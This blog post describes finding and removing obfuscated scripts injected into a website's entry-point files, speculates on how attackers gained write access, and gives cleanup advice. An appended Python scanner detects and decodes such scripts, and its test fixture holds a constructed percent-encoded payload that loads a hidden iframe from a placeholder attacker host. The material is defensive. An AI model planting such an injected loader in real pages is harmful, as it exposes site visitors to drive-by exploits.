Forget marketing, try hacking for fun and profit!

I was going to do a post on marketing and the B.S. tactics that are increasingly in use.  Indeed, this blog gets an average of six comment posts a week extolling the virtues of low-cost faux boner pills and heart medication (I’d be wary of the latter), or how to get rich by marketing faux boner pills and heart medication.  There are plenty of others, and all have the commonality of playing upon two major human weaknesses: Fear and Greed.  The Greed is pretty straightforward; who doesn’t want to be rich?  But the Fear is more insidious, as there are tons of things people are afraid of, such as:

  • My Health: I’m afraid to die!  Give me pills that allow me to live forever, even though my retirement money will run out soon.
  • My Wealth: I’m afraid of being poor and homeless.  This fear is the least unfounded of the group, these days.
  • My Social Standing:  I’m afraid that if I don’t keep up with the latest fads and trends I’ll be considered in some unflattering light.
  • My Connectivity:  I’m afraid that if I absolutely, positively, cannot be in constant communication with everyone I know, and update my Facebook status from anywhere, I will miss out on something!
  • My Boner: I’m afraid that if I can’t perform sexually, all the time, every time, my wife/girlfriend/life-partner will look for sex elsewhere.
  • My Toilet Paper: I am terribly afraid that my toilet paper will leave little pieces on my buttocks, or that guests to my home will see the roll.
  • Everything Else:  I’m afraid of everything, but I am also afraid of being Agoraphobic.  Sell me something quick, to comfort me and give my life meaning!

And there are plenty more you could come up with, I’m sure.  But, these marketing tactics are nothing new (think of how many bomb shelters were sold during the height of the Cold War.  Ah, the good old days…), and pointing them out is a fool’s errand as few people apply reason where Fear and Greed are concerned.

Instead, the point of this post is to share something I discovered today while doing some website housekeeping: the existence of some nasty little scripts added to my page code.  I wouldn’t have noticed them were it not for Microsoft Security Essentials (MSE), in conjunction with a site-wide backup, bringing the scripts to light.

The backup was done by my S.O.P.: I FTP the website folders to a directory on my home computer and download a zipped copy of the MySQL table schema to the same directory.  Simple enough…I’d done this a few dozen times before.  But this time around, MSE was throwing frequent alerts on a known Trojan.  That is not wholly unusual with heuristic anti-virus: a normally safe bit of code can resemble something in the AV database.  However, I know I haven’t written anything Trojan-like, and more than one alert made me think there was some serious poop happening.  My suspicions were confirmed when I could not open a file locally in Notepad; MSE squashed that with a quickness!  I browsed up to my cPanel and did a little snooping in the files with the on-site editor.  What I found was a cryptic script appended to every instance of a generic entry file throughout the site: index.php, index.html, and default.html.  About 30 minutes of searching for and deleting these pests (while muttering profuse epithets toward the scum that deposited the scripts in the first place) resulted in being able to back up my site without MSE flags being raised.

Thinking that this might not be an isolated event, I immediately did a backup of a client’s sites and came across the same scripts, and in some cases additional scripts added to the top of the page.  What the hell?  Oh, well.  Repeat the cleaning process and move on.  That was three hours I’ll never get back.  But it got me to thinking:  How did they get there?

The why is pretty easy.  Evil hackers look for all sorts of ways to get their grubby little scripts onto as many individual computers as they can for all sorts of nefarious purposes.  An injected script on a legitimate, trusted site is just the delivery mechanism: it typically pulls in a hidden iframe or a second script from the attacker’s server, so every visitor gets served whatever browser exploit is current that week without the site owner ever noticing.  There is big money in furtively collecting personal and financial information from unsuspecting users, for example, or zombie-fying a slew of computers to perpetrate a Distributed Denial of Service (DDoS) attack in an extortion plot against a large web-connected entity (banks, the FBI, maybe the power grid?).

But the how still eludes me.  Whatever did it had write access to my files, and there are only so many ways to get that: stolen FTP or cPanel credentials (a plain FTP login crosses the network in clear text, and there is malware whose whole job is to harvest saved FTP passwords from a PC), a vulnerable script somewhere on the site, or a neighbour on the same shared server.  The scripts turning up only in the entry-point files doesn’t settle it either way; someone with my password could just as easily have touched every page, but the automated injection kits that do this target index.php and friends precisely because those are the files every visitor loads.  Indeed, there could have been some better-hidden funkiness stuck into called-code that I might never have noticed without a line-by-line investigation.  So, no, I don’t believe this was a hands-on attack.  This is an automated thing (a worm?) that looks for the common entry-point files in a site and deposits its manure on the fertile fields at the top or bottom before crawling off to infect someone else, and the uncomfortable corollary is that unless I find and close the door it came through, it will be back.

So, what to do?  I’m not sure.  One thing I’m going to try is to find some way of giving my entry-point files a different name.  Something cryptic that will thwart guessing.  I believe that can be accomplished through the .htaccess file (Apache’s DirectoryIndex directive tells the server which file to serve for a bare directory URL, so the file can be called anything).  The main thing is to get away from the generic names that are easy targets.  The caveat is that renaming only defeats something guessing file names from the outside; anything that already has FTP or cPanel access can list the directory and see the new name, and plenty of these injectors hit every .html and .php file they find anyway.  So before, or at least alongside, the rename: change the FTP and cPanel passwords from a machine you trust (and scan the machine that held the old ones), use SFTP or FTPS instead of plain FTP if the host offers it, compare the cleaned site against a known-good backup so nothing else modified at the same time slips by, and look at the file modification times on the server to see what else was touched in that window.

Finally, if you have a website or blog, you may want to look at the source code (you can do that in IE and Firefox with a right-click and View Source) to see if there are any long strings of two or three character clusters at the top or bottom of the page: runs of %XX or \xXX escapes, typically wrapped in something like eval(unescape('…')) or document.write(…), which is just a <script> tag obfuscated so nobody reading the page can tell what it loads.  If there are, remove them if you can, and then change the password for whatever put them there, because deleting the script does nothing about the access that planted it.  If you can’t, tell somebody (look for a “contact us” link).  There may be occasions where a single-line, un-commented, and poorly located script like that is there for a good reason, but I can’t think of one.
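Here is the check I would actually run over the downloaded site instead of eyeballing every file, both for the cleanup described above and for the View Source advice.  This is an added example, not code from the original post: it walks the backup directory, looks only at the entry-point files named above, flags a <script> whose body is one long run of %XX / \xXX clusters handed to eval(unescape(…)) or document.write(unescape(…)), decodes it so you can see what it really loads, and can strip it.  The function names, the sample infected page, and the example.invalid host are constructed for the demo.  It recognizes only this one obfuscation style, so a clean result means “nothing of this shape”, not “clean”.

```python
"""Scan a downloaded copy of a site for injected scripts in entry-point files.

Added example (not code from the original post). Assumes the site has been
FTP'd down to a local directory as the post describes; the infected page
below is constructed for the demo and example.invalid is a placeholder host.
"""
import os
import re
import tempfile
from urllib.parse import unquote

# The files the post found hit; add whatever else your server serves as a default page.
ENTRY_FILES = {"index.php", "index.html", "index.htm", "default.html", "default.htm"}

# One run of %XX or \xXX clusters: the "long string of two or three character
# clusters" seen in View Source.  Ordinary markup never has 20+ of them in a row.
ENCODED_RUN = r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}){20,}"

# A <script> whose whole body is one such run fed to eval()/document.write() via
# unescape().  Other obfuscations (base64, String.fromCharCode arrays) will NOT
# match; treat a miss here as "not proven clean", never as "clean".
INJECTED_SCRIPT = re.compile(
    r"<script[^>]*>\s*(?:eval|document\.write)\s*\(\s*unescape\s*\(\s*['\"]"
    r"(" + ENCODED_RUN + r")"
    r"['\"]\s*\)\s*\)\s*;?\s*</script>",
    re.IGNORECASE | re.DOTALL,
)


def decode_run(run: str) -> str:
    """Decode a %XX / \\xXX run into the text a visitor's browser would execute."""
    return unquote(run.replace("\\x", "%"))


def find_injections(html: str) -> list:
    """Return [(offset, decoded_payload), ...] for every injected script in a page."""
    return [(m.start(), decode_run(m.group(1))) for m in INJECTED_SCRIPT.finditer(html)]


def clean_page(html: str) -> str:
    """Strip the injected scripts; a page with none comes back unchanged."""
    return INJECTED_SCRIPT.sub("", html)


def scan_tree(root: str) -> dict:
    """Walk a downloaded site; map each infected entry file to its decoded payloads."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() not in ENTRY_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = find_injections(fh.read())
            if found:
                hits[path] = [payload for _, payload in found]
    return hits


# --- constructed sample so the scanner can be exercised offline ---------------

def encode_like_injector(text: str) -> str:
    """Percent-encode every character, the way these droppers obfuscate their one line."""
    return "".join("%%%02X" % ord(c) for c in text)


# What the browser is really asked to run: a 1x1 invisible iframe from the attacker's host.
SAMPLE_PAYLOAD = ("document.write('<iframe src=\"http://example.invalid/in.php\" "
                  "width=1 height=1 style=\"visibility:hidden\"></iframe>')")
CLEAN_PAGE = "<html><body><h1>Welcome</h1></body></html>\n"
INFECTED_PAGE = (CLEAN_PAGE + "<script>eval(unescape('"
                 + encode_like_injector(SAMPLE_PAYLOAD) + "'))</script>")


def demo() -> dict:
    """Write a constructed two-page site to a temp dir and scan it (only index.html is hit)."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "blog"))
    with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
        fh.write(INFECTED_PAGE)
    with open(os.path.join(root, "blog", "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php echo 'untouched'; ?>\n")  # must not be reported
    return scan_tree(root)


if __name__ == "__main__":
    for path, payloads in demo().items():
        print(path)
        for p in payloads:
            print("   decodes to:", p)
```

Point scan_tree at the directory you FTP’d the site into.  Decode anything it reports before deleting it: the iframe or script URL that falls out is what tells you what your visitors were exposed to, and it is what the hosting company will want when you report the compromise.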